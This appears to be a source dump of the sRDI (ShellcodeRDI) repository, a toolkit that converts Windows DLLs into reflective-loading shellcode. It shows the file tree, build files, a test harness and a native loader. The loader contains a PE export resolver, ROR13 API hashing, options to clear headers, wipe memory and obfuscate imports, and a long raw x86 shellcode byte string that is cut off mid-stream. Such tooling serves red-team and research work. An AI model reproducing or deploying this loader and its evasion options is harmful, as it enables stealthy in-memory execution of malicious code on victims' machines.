├── .gitignore
├── DotNet
├── App.config
├── DotNet.csproj
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── FunctionTest
├── FunctionTest.cpp
├── FunctionTest.vcxproj
├── FunctionTest.vcxproj.filters
├── stdafx.cpp
├── stdafx.h
└── targetver.h
├── LICENSE
├── Native
├── Loader.cpp
├── Native.vcxproj
├── Native.vcxproj.filters
├── stdafx.cpp
├── stdafx.h
└── targetver.h
├── PowerShell
├── ConvertTo-Shellcode.ps1
└── Invoke-Shellcode.ps1
├── Python
├── ConvertToShellcode.py
├── Python.pyproj
└── ShellcodeRDI.py
├── README.md
├── ShellcodeRDI.sln
├── ShellcodeRDI
├── GetProcAddressWithHash.h
├── ShellcodeRDI.c
├── ShellcodeRDI.vcxproj
├── ShellcodeRDI.vcxproj.filters
└── function_link_order.txt
├── TestDLL
├── Resource.rc
├── TestDLL.vcxproj
├── TestDLL.vcxproj.filters
├── dllmain.cpp
└── resource.h
├── bin
└── .gitignore
└── lib
├── PowerShell
├── Get-FunctionHash.ps1
├── Get-LibSymbols.ps1
├── Get-ObjDump.format.ps1xml
├── Get-PEHeader.ps1
└── Out-Shellcode.ps1
└── Python
├── EncodeBlobs.py
└── FunctionToHash.py
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.suo
8 | *.user
9 | *.userosscache
10 | *.sln.docstates
11 |
12 | # User-specific files (MonoDevelop/Xamarin Studio)
13 | *.userprefs
14 |
15 | # Build results
16 | [Dd]ebug/
17 | [Dd]ebugPublic/
18 | [Rr]elease/
19 | [Rr]eleases/
20 | x64/
21 | x86/
22 | bld/
23 | [Oo]bj/
24 | [Ll]og/
25 |
26 | # Visual Studio 2015 cache/options directory
27 | .vs/
28 | # Uncomment if you have tasks that create the project's static files in wwwroot
29 | #wwwroot/
30 |
31 | # MSTest test Results
32 | [Tt]est[Rr]esult*/
33 | [Bb]uild[Ll]og.*
34 |
35 | # NUNIT
36 | *.VisualState.xml
37 | TestResult.xml
38 |
39 | # Build Results of an ATL Project
40 | [Dd]ebugPS/
41 | [Rr]eleasePS/
42 | dlldata.c
43 |
44 | # .NET Core
45 | project.lock.json
46 | project.fragment.lock.json
47 | artifacts/
48 | **/Properties/launchSettings.json
49 |
50 | *_i.c
51 | *_p.c
52 | *_i.h
53 | *.ilk
54 | *.meta
55 | *.obj
56 | *.pch
57 | *.pdb
58 | *.pgc
59 | *.pgd
60 | *.rsp
61 | *.sbr
62 | *.tlb
63 | *.tli
64 | *.tlh
65 | *.tmp
66 | *.tmp_proj
67 | *.log
68 | *.vspscc
69 | *.vssscc
70 | .builds
71 | *.pidb
72 | *.svclog
73 | *.scc
74 |
75 | # Chutzpah Test files
76 | _Chutzpah*
77 |
78 | # Visual C++ cache files
79 | ipch/
80 | *.aps
81 | *.ncb
82 | *.opendb
83 | *.opensdf
84 | *.sdf
85 | *.cachefile
86 | *.VC.db
87 | *.VC.VC.opendb
88 |
89 | # Visual Studio profiler
90 | *.psess
91 | *.vsp
92 | *.vspx
93 | *.sap
94 |
95 | # TFS 2012 Local Workspace
96 | $tf/
97 |
98 | # Guidance Automation Toolkit
99 | *.gpState
100 |
101 | # ReSharper is a .NET coding add-in
102 | _ReSharper*/
103 | *.[Rr]e[Ss]harper
104 | *.DotSettings.user
105 |
106 | # JustCode is a .NET coding add-in
107 | .JustCode
108 |
109 | # TeamCity is a build add-in
110 | _TeamCity*
111 |
112 | # DotCover is a Code Coverage Tool
113 | *.dotCover
114 |
115 | # Visual Studio code coverage results
116 | *.coverage
117 | *.coveragexml
118 |
119 | # NCrunch
120 | _NCrunch_*
121 | .*crunch*.local.xml
122 | nCrunchTemp_*
123 |
124 | # MightyMoose
125 | *.mm.*
126 | AutoTest.Net/
127 |
128 | # Web workbench (sass)
129 | .sass-cache/
130 |
131 | # Installshield output folder
132 | [Ee]xpress/
133 |
134 | # DocProject is a documentation generator add-in
135 | DocProject/buildhelp/
136 | DocProject/Help/*.HxT
137 | DocProject/Help/*.HxC
138 | DocProject/Help/*.hhc
139 | DocProject/Help/*.hhk
140 | DocProject/Help/*.hhp
141 | DocProject/Help/Html2
142 | DocProject/Help/html
143 |
144 | # Click-Once directory
145 | publish/
146 |
147 | # Publish Web Output
148 | *.[Pp]ublish.xml
149 | *.azurePubxml
150 | # TODO: Comment the next line if you want to checkin your web deploy settings
151 | # but database connection strings (with potential passwords) will be unencrypted
152 | *.pubxml
153 | *.publishproj
154 |
155 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
156 | # checkin your Azure Web App publish settings, but sensitive information contained
157 | # in these scripts will be unencrypted
158 | PublishScripts/
159 |
160 | # NuGet Packages
161 | *.nupkg
162 | # The packages folder can be ignored because of Package Restore
163 | **/packages/*
164 | # except build/, which is used as an MSBuild target.
165 | !**/packages/build/
166 | # Uncomment if necessary however generally it will be regenerated when needed
167 | #!**/packages/repositories.config
168 | # NuGet v3's project.json files produces more ignorable files
169 | *.nuget.props
170 | *.nuget.targets
171 |
172 | # Microsoft Azure Build Output
173 | csx/
174 | *.build.csdef
175 |
176 | # Microsoft Azure Emulator
177 | ecf/
178 | rcf/
179 |
180 | # Windows Store app package directories and files
181 | AppPackages/
182 | BundleArtifacts/
183 | Package.StoreAssociation.xml
184 | _pkginfo.txt
185 |
186 | # Visual Studio cache files
187 | # files ending in .cache can be ignored
188 | *.[Cc]ache
189 | # but keep track of directories ending in .cache
190 | !*.[Cc]ache/
191 |
192 | # Others
193 | ClientBin/
194 | ~$*
195 | *~
196 | *.dbmdl
197 | *.dbproj.schemaview
198 | *.jfm
199 | *.pfx
200 | *.publishsettings
201 | orleans.codegen.cs
202 |
203 | # Since there are multiple workflows, uncomment next line to ignore bower_components
204 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
205 | #bower_components/
206 |
207 | # RIA/Silverlight projects
208 | Generated_Code/
209 |
210 | # Backup & report files from converting an old project file
211 | # to a newer Visual Studio version. Backup files are not needed,
212 | # because we have git ;-)
213 | _UpgradeReport_Files/
214 | Backup*/
215 | UpgradeLog*.XML
216 | UpgradeLog*.htm
217 |
218 | # SQL Server files
219 | *.mdf
220 | *.ldf
221 | *.ndf
222 |
223 | # Business Intelligence projects
224 | *.rdl.data
225 | *.bim.layout
226 | *.bim_*.settings
227 |
228 | # Microsoft Fakes
229 | FakesAssemblies/
230 |
231 | # GhostDoc plugin setting file
232 | *.GhostDoc.xml
233 |
234 | # Node.js Tools for Visual Studio
235 | .ntvs_analysis.dat
236 | node_modules/
237 |
238 | # Typescript v1 declaration files
239 | typings/
240 |
241 | # Visual Studio 6 build log
242 | *.plg
243 |
244 | # Visual Studio 6 workspace options file
245 | *.opt
246 |
247 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
248 | *.vbw
249 |
250 | # Visual Studio LightSwitch build output
251 | **/*.HTMLClient/GeneratedArtifacts
252 | **/*.DesktopClient/GeneratedArtifacts
253 | **/*.DesktopClient/ModelManifest.xml
254 | **/*.Server/GeneratedArtifacts
255 | **/*.Server/ModelManifest.xml
256 | _Pvt_Extensions
257 |
258 | # Paket dependency manager
259 | .paket/paket.exe
260 | paket-files/
261 |
262 | # FAKE - F# Make
263 | .fake/
264 |
265 | # JetBrains Rider
266 | .idea/
267 | *.sln.iml
268 |
269 | # CodeRush
270 | .cr/
271 |
272 | # Python Tools for Visual Studio (PTVS)
273 | __pycache__/
274 | *.pyc
275 |
276 | # Cake - Uncomment if you are using it
277 | # tools/**
278 | # !tools/packages.config
279 |
280 | # Telerik's JustMock configuration file
281 | *.jmconfig
282 |
283 | # BizTalk build output
284 | *.btp.cs
285 | *.btm.cs
286 | *.odx.cs
287 | *.xsd.cs
288 |
--------------------------------------------------------------------------------
/DotNet/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/DotNet/DotNet.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {FD50DEE9-91AB-4449-BA55-27C71098076B}
8 | Exe
9 | Properties
10 | RDIShellcodeLoader
11 | RDIShellcodeLoader
12 | v3.5
13 | 512
14 | true
15 | publish\
16 | true
17 | Disk
18 | false
19 | Foreground
20 | 7
21 | Days
22 | false
23 | false
24 | true
25 | 0
26 | 1.0.0.%2a
27 | false
28 | false
29 | true
30 |
31 |
32 |
33 | true
34 | bin\x64\Debug\
35 | DEBUG;TRACE
36 | true
37 | full
38 | x64
39 | prompt
40 | MinimumRecommendedRules.ruleset
41 | false
42 |
43 |
44 | bin\x64\Release\
45 | TRACE
46 | true
47 | pdbonly
48 | x64
49 | prompt
50 | MinimumRecommendedRules.ruleset
51 | false
52 |
53 |
54 | true
55 | bin\x86\Debug\
56 | DEBUG;TRACE
57 | true
58 | full
59 | x86
60 | prompt
61 | MinimumRecommendedRules.ruleset
62 | false
63 |
64 |
65 | bin\x86\Release\
66 | TRACE
67 | true
68 | pdbonly
69 | x86
70 | prompt
71 | MinimumRecommendedRules.ruleset
72 | false
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 | False
92 | Microsoft .NET Framework 4.5.2 %28x86 and x64%29
93 | true
94 |
95 |
96 | False
97 | .NET Framework 3.5 SP1
98 | false
99 |
100 |
101 |
102 |
103 | copy /y $(TargetPath) $(SolutionDir)bin\DotNetLoader_$(PlatformName).exe
104 |
105 |
112 |
--------------------------------------------------------------------------------
/DotNet/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("RDIShellcodeLoader")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("RDIShellcodeLoader")]
13 | [assembly: AssemblyCopyright("Copyright © 2015")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("fd50dee9-91ab-4449-ba55-27c71098076b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/FunctionTest/FunctionTest.cpp:
--------------------------------------------------------------------------------
1 | // FunctionTest.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 | #include
7 |
8 | #define SRDI_CLEARHEADER 0x1
9 | #define SRDI_CLEARMEMORY 0x2
10 | #define SRDI_OBFUSCATEIMPORTS 0x4
11 |
12 | #define DEREF_64( name )*(DWORD64 *)(name)
13 | #define DEREF_32( name )*(DWORD *)(name)
14 | #define DEREF_16( name )*(WORD *)(name)
15 | #define DEREF_8( name )*(BYTE *)(name)
16 |
17 | #define RVA(type, base, rva) (type)((ULONG_PTR) base + rva)
18 |
19 | FARPROC GetProcAddressR(HMODULE hModule, LPCSTR lpProcName)
20 | {
21 | if (hModule == NULL || lpProcName == NULL)
22 | return NULL;
23 |
24 | PIMAGE_NT_HEADERS ntHeaders = RVA(PIMAGE_NT_HEADERS, hModule, ((PIMAGE_DOS_HEADER)hModule)->e_lfanew);
25 | PIMAGE_DATA_DIRECTORY dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
26 | if (!dataDir->Size)
27 | return NULL;
28 |
29 | PIMAGE_EXPORT_DIRECTORY exportDir = RVA(PIMAGE_EXPORT_DIRECTORY, hModule, dataDir->VirtualAddress);
30 | if (!exportDir->NumberOfNames || !exportDir->NumberOfFunctions)
31 | return NULL;
32 |
33 | PDWORD expName = RVA(PDWORD, hModule, exportDir->AddressOfNames);
34 | PWORD expOrdinal = RVA(PWORD, hModule, exportDir->AddressOfNameOrdinals);
35 | LPCSTR expNameStr;
36 |
37 | for (DWORD i = 0; i < exportDir->NumberOfNames; i++, expName++, expOrdinal++) {
38 |
39 | expNameStr = RVA(LPCSTR, hModule, *expName);
40 |
41 | if (!expNameStr)
42 | break;
43 |
44 | if (!_stricmp(lpProcName, expNameStr)) {
45 | DWORD funcRva = *RVA(PDWORD, hModule, exportDir->AddressOfFunctions + (*expOrdinal * 4));
46 | return RVA(FARPROC, hModule, funcRva);
47 | }
48 | }
49 |
50 | return NULL;
51 | }
52 |
53 |
54 | DWORD GetFileContents(LPCSTR filename, LPSTR *data, DWORD &size)
55 | {
56 | std::FILE *fp = std::fopen(filename, "rb");
57 |
58 | if (fp)
59 | {
60 | fseek(fp, 0, SEEK_END);
61 | size = ftell(fp);
62 | fseek(fp, 0, SEEK_SET);
63 |
64 | *data = (LPSTR)malloc(size + 1);
65 | fread(*data, size, 1, fp);
66 | fclose(fp);
67 | return true;
68 | }
69 | return false;
70 | }
71 |
72 | #define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
73 |
74 | DWORD HashFunctionName(LPSTR name) {
75 | DWORD hash = 0;
76 |
77 | do
78 | {
79 | hash = ROTR32(hash, 13);
80 | hash += *name;
81 | name++;
82 | } while (*(name - 1) != 0);
83 |
84 | return hash;
85 | }
86 |
87 | extern "C" ULONG_PTR LoadDLL(ULONG_PTR uiLibraryAddress, DWORD dwFunctionHash, LPVOID lpUserData, DWORD nUserdataLen, DWORD flags);
88 |
89 | int main()
90 | {
91 | LPSTR buffer = NULL;
92 | DWORD bufferSize = 0;
93 |
94 | HMODULE test = LoadLibraryA("User32.dll"); // For MessageBox Testing
95 |
96 | #ifdef _WIN64
97 | LPCSTR fileName = "../bin/TestDLL_x64.dll";
98 | #else
99 | LPCSTR fileName = "../bin/TestDLL_x86.dll";
100 | #endif
101 |
102 | DWORD result = GetFileContents(fileName, &buffer, bufferSize);
103 |
104 | if (!result || buffer == NULL) {
105 | printf("[!] Cannot read file.");
106 | return 1;
107 | }
108 |
109 | LoadDLL(
110 | (ULONG_PTR)buffer,
111 | HashFunctionName("SayGoodbye"),
112 | NULL, 0,
113 | SRDI_CLEARHEADER | SRDI_CLEARMEMORY // | SRDI_OBFUSCATEIMPORTS | (3 << 16)
114 | );
115 |
116 | return 0;
117 | }
118 |
119 |
--------------------------------------------------------------------------------
/FunctionTest/FunctionTest.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 15.0
23 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}
24 | Win32Proj
25 | FunctionTest
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | true
78 |
79 |
80 | false
81 |
82 |
83 | false
84 |
85 |
86 |
87 |
88 |
89 | Level3
90 | Disabled
91 | TESTING;WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 |
93 |
94 | Console
95 |
96 |
97 |
98 |
99 |
100 |
101 | Level3
102 | Disabled
103 | TESTING;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 |
105 |
106 | Console
107 |
108 |
109 |
110 |
111 | Level3
112 |
113 |
114 | MaxSpeed
115 | true
116 | true
117 | TESTING;WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 |
119 |
120 | Console
121 | true
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 |
129 |
130 | MaxSpeed
131 | true
132 | true
133 | TESTING;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
134 |
135 |
136 | Console
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
--------------------------------------------------------------------------------
/FunctionTest/FunctionTest.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/FunctionTest/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // FunctionTest.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/FunctionTest/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/FunctionTest/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Native/Loader.cpp:
--------------------------------------------------------------------------------
1 | // RDIShellcodeCLoader.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 | #include
7 |
8 | #define DEREF_64( name )*(DWORD64 *)(name)
9 | #define DEREF_32( name )*(DWORD *)(name)
10 | #define DEREF_16( name )*(WORD *)(name)
11 | #define DEREF_8( name )*(BYTE *)(name)
12 |
13 | #define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
14 | #define RVA(type, base, rva) (type)((ULONG_PTR) base + rva)
15 |
16 | #define SRDI_CLEARHEADER 0x1
17 | #define SRDI_CLEARMEMORY 0x2
18 | #define SRDI_OBFUSCATEIMPORTS 0x4
19 | #define SRDI_PASS_SHELLCODE_BASE 0x8
20 |
21 |
22 | FARPROC GetProcAddressR(HMODULE hModule, LPCSTR lpProcName)
23 | {
24 | if (hModule == NULL || lpProcName == NULL)
25 | return NULL;
26 |
27 | PIMAGE_NT_HEADERS ntHeaders = RVA(PIMAGE_NT_HEADERS, hModule, ((PIMAGE_DOS_HEADER)hModule)->e_lfanew);
28 | PIMAGE_DATA_DIRECTORY dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
29 | if (!dataDir->Size)
30 | return NULL;
31 |
32 | PIMAGE_EXPORT_DIRECTORY exportDir = RVA(PIMAGE_EXPORT_DIRECTORY, hModule, dataDir->VirtualAddress);
33 | if (!exportDir->NumberOfNames || !exportDir->NumberOfFunctions)
34 | return NULL;
35 |
36 | PDWORD expName = RVA(PDWORD, hModule, exportDir->AddressOfNames);
37 | PWORD expOrdinal = RVA(PWORD, hModule, exportDir->AddressOfNameOrdinals);
38 | LPCSTR expNameStr;
39 |
40 | for (DWORD i = 0; i < exportDir->NumberOfNames; i++, expName++, expOrdinal++) {
41 |
42 | expNameStr = RVA(LPCSTR, hModule, *expName);
43 |
44 | if (!expNameStr)
45 | break;
46 |
47 | if (!_stricmp(lpProcName, expNameStr)) {
48 | DWORD funcRva = *RVA(PDWORD, hModule, exportDir->AddressOfFunctions + (*expOrdinal * 4));
49 | return RVA(FARPROC, hModule, funcRva);
50 | }
51 | }
52 |
53 | return NULL;
54 | }
55 |
56 | BOOL Is64BitDLL(UINT_PTR uiLibraryAddress)
57 | {
58 | PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
59 |
60 | if (pNtHeaders->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) return true;
61 | else return false;
62 | }
63 |
64 | DWORD GetFileContents(LPCSTR filename, LPSTR *data, DWORD &size)
65 | {
66 | std::FILE *fp = std::fopen(filename, "rb");
67 |
68 | if (fp)
69 | {
70 | fseek(fp, 0, SEEK_END);
71 | size = ftell(fp);
72 | fseek(fp, 0, SEEK_SET);
73 |
74 | *data = (LPSTR)malloc(size + 1);
75 | fread(*data, size, 1, fp);
76 | fclose(fp);
77 | return true;
78 | }
79 | return false;
80 | }
81 |
82 | DWORD HashFunctionName(LPSTR name) {
83 | DWORD hash = 0;
84 |
85 | do
86 | {
87 | hash = ROTR32(hash, 13);
88 | hash += *name;
89 | name++;
90 | } while (*(name - 1) != 0);
91 |
92 | return hash;
93 | }
94 |
95 | BOOL ConvertToShellcode(LPVOID inBytes, DWORD length, DWORD userFunction, LPVOID userData, DWORD userLength, DWORD flags, LPSTR &outBytes, DWORD &outLength)
96 | {
97 |
98 | LPSTR rdiShellcode = NULL;
99 | DWORD rdiShellcodeLength, dllOffset, userDataLocation;
100 |
101 | #ifdef _DEBUG
102 | LPSTR rdiShellcode64 = NULL, rdiShellcode32 = NULL;
103 | DWORD rdiShellcode64Length = 0, rdiShellcode32Length = 0;
104 | GetFileContents("../bin/ShellcodeRDI_x64.bin", &rdiShellcode64, rdiShellcode64Length);
105 | GetFileContents("../bin/ShellcodeRDI_x86.bin", &rdiShellcode32, rdiShellcode32Length);
106 |
107 | #else
108 | //MARKER:S
109 | LPSTR rdiShellcode32 = "\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89\xAC\x24\xB4\x00\x00\x00\x89\x6C\x24\x38\x89\xAC\x24\xBC\x00\x00\x00\x89\xAC\x24\xC4\x00\x00\x00\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xB0\x00\x00\x00\x89\xAC\x24\xE0\x00\x00\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88\x4C\x24\x79\x88\x8C\x24\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24\x72\x69\x76\xC7\x44\x24\x75\x53\x79\x73\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x49\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x3D\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x38\x50\x55\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x44\x24\x38\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x5C\x89\x44\x24\x14\x8D\x84\x24\xB8\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x14\x8D\x84\x24\xBC\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24\x6C\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x3C\x89\x44\x24\x14\x8D\x84\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xB4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x39\x6C\x24\x38\x0F\x84\xD2\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00\x0F\x84\xC5\x06\x00\x00\x39\xAC\x24\xB0\x00\x00\x00\x0F\x84\xB8\x06\x0